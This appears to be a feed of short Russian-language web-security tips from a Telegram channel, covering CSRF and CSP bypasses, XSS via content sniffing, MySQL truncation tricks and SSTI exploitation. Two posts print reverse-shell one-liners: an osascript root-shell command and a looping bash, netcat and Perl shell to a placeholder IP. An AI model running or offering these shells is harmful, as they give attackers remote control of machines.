Кавычка

Ruby забавно парсит JSON стандартным модулем. В него можно писать комментарии! Например, если серверная часть не проверяет Content-type запроса на application/json, можно сформировать сценарий для CSRF.

AppleScript — мощный инструмент. Нужен root shell? osascript -e "do shell script \"bash -i >& /dev/tcp/%ip%/%port% 0>&1 \" with administrator privileges" Нужен контроль над другим приложением? osascript -e 'tell app "Chrome" to display dialog "Hello World"' (В...

Недавно на ZN:Web Village обсуждались способы обхода Content-Security-Policy, в том числе через использование JSONP колбэков из списка довереных доменов. И тут в твитторе встретилась неплохая подборка таких коллбеков для самых разных сервисов! https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt Разберем...

Некоторые заголовки могут работать как HTML теги (и наоборот) Например, тег включит соотвествующий CSP, как если бы он был в заголовках. Заголовок Refresh: 3;URL=https://hello/ покажет содержимое страницы на три секунды, а потом перенаправит пользователя,...

Bo0oM - I

Слайды с Web VIllage #ZeroNights 2018 https://2018.zeronights.ru/en/materials/

Быстрый поиск по эксплойтам и полезным программам. Enjoy! https://sploitus.com

Кто подавал данные на заведение CVE через https://iwantacve.org могут с удивлением обнаружить, что заявки помещаются в открытый Google Docs (несмотря на то, что там об этом написано). Причем можно посмотреть как на утвержденные уязвимости (прошедшие модерацию,...

Генератор "полезной" картинки для эксплоита бага на примере Wordpress + WooCommerce https://rdot.org/forum/showpost.php?p=44060&postcount=66

Не все йогурты одинаково полезны! В некоторых случаях, такой символ как 💩 — может отрезать часть строки в MySQL (тот случай, когда какое-то говно — альтернатива нульбайту). Причем выстрелить это может разными способами, например, как для обхода валидации...

В современных браузерах мы можем отправить кросс-ориджин POST запрос без заголовка Content-Type. Это может быть полезно, если сайт для защиты от CSRF чекает Content-Type, но пропускает проверку, если этот заголовок отсутствует. Всё что нужно - создать...

Отдельно про text/plain. Сниффинг содержимого text/plain замечен также у IE 8 если у файла не будет расширения. А с помощью ловкости рук можно заставить выполнить там XSS даже на более свежих версиях, если на ресурсе не запрещена загрузка в фрейме. https://jankopecky.net/index.php/2017/04/18/0day-textplain-considered-harmful/...

Если у страницы не будет указан Content-Type (передаю привет старику HTTP/0.9) - браузер попытается сам определить содержимое. Тоже самое, если тип контента браузеру не будет знаком. Internet Explorer 8 (спи спокойно Windows XP), например, не признает...

Если ты встречал странный base64 в параметрах веб-приложений, разбитый двумя точками - скорее всего это JSON Web Tokens. Он состоит из заголовка, содержимого и подписи, считается одним из безопасных способов передачи информации, поддерживает различные...

При внедрении собственных шаблонов в серверные шаблонизаторы (уязвимость SSTI) — эксплуатацию можно автоматизировать с помощью утилиты tplmap. Она и шаблонизатор подберет, и удобный шелл откроет для выполнения произвольного кода. Еще и плагин к Burp Suite...

Годный доклад на OWASP AppSecEU 2018, от Frans Rosén'а https://speakerdeck.com/fransrosen/owasp-appseceu-2018-attacking-modern-web-technologies?slide=15

Знаете ли вы, что reCAPTCHA (та самая капча от Google) дает возможность выполнять CSRF-атаки? CSRF-токен — ключ выданный пользователю для предотвращения межсайтовой подделки запросов. Мы тебе дали секретное слово - хочешь отправить данные на сайт, повтори...

Обходим экзотичную CSRF защиту Сперва ликбез. Засабмитить форму POST-запросом можно со следующими mime type: a) text/plain b) application/x-www-form-urlencoded: param1=a¶m2=b c) multipart/form-data: ---------------------------974767299852498929531610575 Content-Disposition:...

Не весь кэш одинаково полезен https://bo0om.ru/web-cache-deception-attack

На случай важных переговоров: while true;do bash -i >& /dev/tcp/IP/1337 0>&1;nc -e /bin/sh IP 1337;perl -e 'use Socket;$i="IP";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh...